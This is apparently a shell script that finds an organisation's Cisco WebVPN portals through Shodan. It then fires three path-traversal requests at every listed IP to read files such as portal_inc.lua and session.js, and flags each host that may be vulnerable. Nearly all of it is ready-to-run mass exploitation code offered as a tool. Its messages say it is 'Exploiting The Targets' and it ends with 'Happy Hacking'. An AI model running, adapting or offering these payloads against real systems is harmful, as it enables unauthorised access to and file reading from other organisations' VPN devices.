#!/bin/bash

read -p "Enter organization name like google, apple: " orgz
mkdir -p $orgz

echo -e "\n\e[93m[+]Total Targets Found On Shodan: \e[0m"
shodan count "set-cookie: webvpn;" org:"$orgz"

echo -e "\n\e[93m[+]Targets IP\e[0m"
shodan search --fields ip_str "set-cookie: webvpn;" org:"$orgz" | sed -r 's/\s+//g' | sed '/^$/d' |tee $orgz/$orgz.txt

echo -e "\n\e[93m[+]Exploiting The Targets Part-1\e[0m\n"
while IFS= read -r tar; do echo -e "===================================================" && echo "$tar" && if curl -s "https://$tar/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" -k | if grep 'Bad Request' &> /dev/null; then echo -e "\n\e[32m[-]Not Vulnerable\e[0m"; else echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m https://$tar/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"; fi; then echo ""; fi ; done < $orgz/$orgz.txt

echo -e "\n\e[93m[+]Exploiting The Targets Part-2\e[0m\n"
while IFS= read -r tar; do echo -e "-----------------------------------------------------" && echo "$tar" && if curl -s "https://$tar/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" -k | if grep 'Bad Request' &> /dev/null; then echo -e "\n\e[32m[-]Not Vulnerable\e[0m"; else echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m https://$tar/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"; fi; then echo ""; fi ; done < $orgz/$orgz.txt

echo -e "\n\e[93m[+]Exploiting The Targets Part-3\e[0m\n"
while IFS= read -r tar; do echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" && echo "$tar" && if curl -ks "https://$tar/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../" --output session.js && if cat session.js | grep 'Bad Request'; then echo -e "\n\e[32m[-]Not Vulnerable\e[0m"; else echo -e "\n\e[31m[+]May Be Vulnerable:\e[0m https://$tar/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../"; fi; then rm -rf *.js; fi ; done < $orgz/$orgz.txt


echo -e "\n\e[92mFollow Me On\e[0m" "\e[34mTwitter\e[0m" "\e[5m\e[93m@darklotuskdb\e[0m" "\e[92mHappy Hacking\e[0m"
echo -e "\n\e[1mGood Day\e[0m\n"
